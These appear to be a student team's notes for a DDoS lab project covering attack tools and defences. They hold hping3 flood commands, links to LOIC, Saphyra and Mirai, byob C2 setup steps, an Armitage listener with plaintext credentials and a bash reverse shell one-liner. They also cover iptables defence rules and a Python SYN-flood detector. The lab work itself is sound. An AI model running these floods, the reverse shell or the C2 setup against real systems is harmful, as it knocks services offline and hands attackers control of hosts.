DDOS

https://github.com/jgamblin/Mirai-Source-Code/blob/master/ForumPost.md


Division of work

Techniques used

Attacker

  • Attack script
  • Find the latest attack techniques

Defense

  • ML
  • Research defense techniques

Env (for experiments)

  • Build an environment or find a physical one

Attack targets

Bandwidth

There is a paper -> file transfer can reach 1.7 TB/s

Memory

Attack tools

Low Orbit Ion Cannon

https://github.com/NewEraCracker/LOIC

Linux

mono (required)

https://www.monodevelop.com/download/#fndtn-download-lin

apt-get install mono-complete

hping3

ICMP flooding

-> Attack bandwidth

hping3 -1 --flood <ip Address>

Wireshark

Defense -> disable ICMP

SYN flooding

hping3 -d 200 -p 80 -S --flood <ip address>

Target: 192.168.86.181
-d 200 -> 200-byte data payload

Defense -> firewall

Saphyra

HTTP GET

Bypasses the firewall by using different User-Agent values (HTTP header) to cause confusion

HTTP GET -> requests the target host

Script

https://github.com/IkzCx/ProgramsForDDos/blob/master/Saphyra.py

Analysis tool

nload

Usage

nload

C2 server

byob

Docs

https://github.com/malwaredllc/byob/wiki

Linux env setup

video1
video2
video3

git clone https://github.com/malwaredllc/byob.git

https://github.com/malwaredllc/byob/wiki/Installing-Requirements-on-Linux

apt install python2

Run setup.py

Armitage

https://github.com/Intek13x/armitage

Creating a Listener in Armitage

host:127.0.0.1 
port 55555
Account: meowhecker
Password: meowhecker

Reverse shell

bash -c '0<&103-;exec 103<>/dev/tcp/192.168.203.151/443;sh <&103 >&103 2>&103'

IEEE paper

Intelligent Detection System for a Distributed Denial-of-Service (DDoS) Attack Based on Time Series

Analysis of hping3 attack behaviour
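As an added example (not from these notes or the paper above), a small Python detector in the spirit of time-series analysis: it counts bare SYNs per source per one-second window over tcpdump-style lines and flags sources whose rate looks like `hping3 -S --flood`. The log lines, the 192.168.86.10 / 192.168.86.99 addresses and the threshold are constructed assumptions; only 192.168.86.181 is the target from the notes.

```python
import re
from collections import defaultdict

# tcpdump-style line: "HH:MM:SS.ffffff IP src.port > dst.port: Flags [S], length N"
LINE_RE = re.compile(
    r"^(?P<h>\d+):(?P<m>\d+):(?P<s>\d+\.\d+) IP (?P<src>[\d.]+)\.\d+ > "
    r"(?P<dst>[\d.]+)\.\d+: Flags \[(?P<flags>[^\]]+)\]"
)

def parse_line(line):
    """Return (seconds_since_midnight, src, dst, flags) or None for unparsable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    t = int(m["h"]) * 3600 + int(m["m"]) * 60 + float(m["s"])
    return t, m["src"], m["dst"], m["flags"]

def syn_rate_alerts(lines, window=1.0, threshold=100):
    """Count bare SYNs (flags 'S'; 'S.' is a SYN-ACK) per source per time window
    and return {src: peak_syn_count} for every source whose peak meets threshold."""
    buckets = defaultdict(lambda: defaultdict(int))  # src -> window index -> SYNs
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        t, src, _dst, flags = parsed
        if flags == "S":
            buckets[src][int(t // window)] += 1
    peaks = {src: max(b.values()) for src, b in buckets.items()}
    return {src: n for src, n in peaks.items() if n >= threshold}

def constructed_capture():
    """Constructed sample (not a real capture): one normal handshake from
    192.168.86.10, then 300 bare SYNs within 0.3 s from 192.168.86.99 to port 80."""
    lines = [
        "10:00:00.100000 IP 192.168.86.10.41000 > 192.168.86.181.80: Flags [S], length 0",
        "10:00:00.150000 IP 192.168.86.181.80 > 192.168.86.10.41000: Flags [S.], length 0",
        "10:00:00.200000 IP 192.168.86.10.41000 > 192.168.86.181.80: Flags [.], length 0",
    ]
    for i in range(300):
        lines.append(
            f"10:00:00.{500000 + i * 1000:06d} IP 192.168.86.99.{40000 + i} > "
            "192.168.86.181.80: Flags [S], length 200"
        )
    return lines

if __name__ == "__main__":
    for src, peak in syn_rate_alerts(constructed_capture()).items():
        print(f"ALERT: {src} sent {peak} SYNs in one second")
```

Feed it `tcpdump -nn -l 'tcp[tcpflags] & tcp-syn != 0'` output line by line to run it against live traffic; the threshold should be tuned to the host's normal connection rate.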

iptables

Linux Firewall

Flags

  • -t table

  • -A append: add the rule at the end of the chain

  • -I insert: insert the rule at position "?" (default = 1)

  • -v verbose

Filter Table

INPUT chain (inbound)

Add New Rules

iptables -t filter -A INPUT -j DROP -p tcp --dport 80

Delete Rules

iptables -t filter -D INPUT 1

Deletes the first rule

OUTPUT chain (outbound)

ping 192.168.203.151
PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
64 bytes from 192.168.203.151: icmp_seq=1 ttl=64 time=5.23 ms
64 bytes from 192.168.203.151: icmp_seq=2 ttl=64 time=1.02 ms

iptables -t filter -A OUTPUT -j DROP -p icmp -d 192.168.203.151

root@ubuntu:/home/user# ping 192.168.203.151
PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted

MAC filter (MAC filtering)

(effective)

iptables -A INPUT -m mac --mac-source 00:0c:29:45:2d:c2 -j DROP

NAT table (NAT configuration)

Show

iptables -t nat -L

The NAT table has 4 chains

  • PREROUTING (before routing)

Changes the destination IP or address

Can be used for forwarding

  • INPUT

  • OUTPUT

  • POSTROUTING (after routing)

Changes the source IP or address

Prevent SYN